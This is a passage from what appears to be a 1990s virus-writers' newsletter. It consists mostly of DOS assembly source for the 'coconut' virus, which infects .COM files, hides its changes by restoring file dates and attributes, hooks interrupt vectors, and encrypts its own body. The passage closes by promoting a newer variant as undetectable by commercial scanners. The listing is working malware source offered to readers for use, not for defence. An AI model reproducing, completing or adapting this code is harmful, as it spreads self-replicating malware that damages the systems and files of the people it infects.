JB PAYLOAD XCHG BX,AX MOV AX,5700 ;get file date/time INT 01 MOV [FILE_DATE],DX ;and save MOV [FILE_TIME],CX MOV DX,0100 MOV AH,40 ;write file MOV CX,052Bh INT 01 MOV AX,5701 ;set file date/time MOV CX,[FILE_TIME] MOV DX,[FILE_DATE] INT 01 MOV AH,3E ;close file INT 01 MOV DX,009E MOV CX,[ATTRIBUTE] MOV AX,4301 ;set file attribute INT 01 CALL DECODE RET LAB_01: CLI ;set Int 01h-vector PUSH DS ;to Int 21h-routine XOR AX,AX MOV DS,AX MOV AX,word ptr[offset start-0FC] ;[0004] MOV CS:[INT_01_OFFSET],AX MOV AX,word ptr[offset start-0FA] ;[0006] MOV CS:[INT_01_SEGMENT],AX MOV AX,word ptr[offset start-7C] ;[0084] MOV word ptr[offset start-0FC],AX ;[0004] MOV AX,word ptr[offset start-7A] ;[0086] MOV word ptr[offset start-0FA],AX ;[0006] POP DS STI MOV DX,01D9 ;offset (FILE) MOV AH,4E ;find first MOV CX,0007 INT 01 JNB LAB_02 JMP short PAYLOAD LAB_02: CALL PROC_02 MOV DX,0080 MOV AH,4F ;find next INT 01 JNB LAB_03 JMP short PAYLOAD LAB_03: JMP short LAB_02 PAYLOAD: MOV AH,2A ;get date INT 01 CMP DH,08 ;month=8 ? JNZ LAB_PAYLOAD_1 CMP DL,1F ;day=31 ? JNZ LAB_PAYLOAD_1 MOV AH,09 ;display string MOV DX,0202 ;offset (MESSAGE) INT 01 LAB_PAYLOAD_1: CLI PUSH DS XOR AX,AX MOV DS,AX MOV AX,CS:[INT_01_OFFSET] MOV word ptr[offset start-0FC],AX ;[0004] MOV AX,CS:[INT_01_SEGMENT] MOV word ptr[offset start-0FA],AX ;[0006] POP DS STI INT 20 ;exit to DOS NEW_KEY: MOV AH,2C ;get time INT 01 CMP DX,+00 JZ NEW_KEY MOV [KEY],DX RET ; FILE db '*.COM',0 INFO db '[Virus coconut, by The King Lizard]' ; MESSAGE DB 0Dh,0A,' ooooo@@@@@@@@@@@@@ooooo' DB 0Dh,0A,' oo@@@@@@@@@@@@@@@@@@@@@@@@@oo' DB 0Dh,0A,' oo@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@oo' DB 0Dh,0A,' o@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@o' DB 0Dh,0A,' o@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@o' DB 0Dh,0A,' o@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@o' DB 0Dh,0A,' @@@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@@@' DB 0Dh,0A,' @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@' DB 0Dh,0A,'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@' DB 0Dh,0A,'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@' DB 0Dh,0A,'@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@' DB 0Dh,0A,'@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@' DB 0Dh,0A,' @@@@ "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" o@@@' DB 0Dh,0A,' @@@o """@@@@@@@@@@@@@@@@@@@@@@""" o@@@' DB 0Dh,0A,' @@@o "@@@"@@@@@@"@@@" o@@@' DB 0Dh,0A,' @@@@o @ @ o@@@"' DB 0Dh,0A,' "@@@@o o@@@@' DB 0Dh,0A,' "@@@@@o o@@@@@"' DB 0Dh,0A,' ""@@@@@oooooooooooooooo@@@@@""' DB 0Dh,0A,' ""@@@@@@@@@@@@@@@@@@@@""' DB 0Dh,0A,' ""@@@@@@@@@@@@@""' DB 0Dh,0A,'$' ; DB 0,0 ;? COUNT dw 0 KEY dw 0 ; FILE_DATE dw 0 FILE_TIME dw 0 ATTRIBUTE dw 0 ; INT_01_OFFSET dw 0 INT_01_SEGMENT dw 0 ENCODE: CALL PROC_01 LAB_ENCODE_01: CMP WORD PTR [COUNT],+00 JZ LAB_ENCODE_02 LODSW ROR AX,CL XOR AX,CX ADD AX,CX STOSW DEC WORD PTR [COUNT] JMP short LAB_ENCODE_01 LAB_ENCODE_02: RET PROC_01: MOV WORD PTR [COUNT],023E MOV SI,015E MOV CX,[KEY] MOV DI,SI RET DECODE: CALL PROC_01 LAB_DECODE_1: CMP WORD PTR [COUNT],+00 JZ LAB_DECODE_2 LODSW SUB AX,CX XOR AX,CX ROL AX,CL STOSW DEC WORD PTR [COUNT] JMP short LAB_DECODE_1 LAB_DECODE_2: INT 3 ;BUG! (shouldn't it be "RET" ?) END START ---------------------------------------------- And for those whom just cannot wait for more of the coconut family, be sure to head on over to Virus Heaven for the newest addition to the family, the COCONUT-2099 virus. It is appending, non-resident w/ double encryption, handler on int 24h, Antitracer, keyboard blocking, dot-dot search and hooks int 3h. It does not infect files exe files under 1k or files over 500k. It does not infect .COM files that have been renamed .EXE. Un-offensive payload and is currently (March 5, 1997) undetectable by commercial Virus scanners. ============================================================================= SECTION - 9 The End Well so brings another close to the Virus Heaven Newsletter. I expect that you guys will leave me alone for a week or two before hounding me about when issue #4 will be out. I will admit this one took awhile to get out, hell I have been working on it since before Christmas. But I have a few ideas for articles. I may even be doing some research on this next one, but that is all I will say for now. And of course, as always, if you write an article send it in. I do have one request though, Please don't send me anymore TROJAN handbooks and tutorials. This was it, I wanna at least keep this thing as focused as a passed out drunkard on the curb.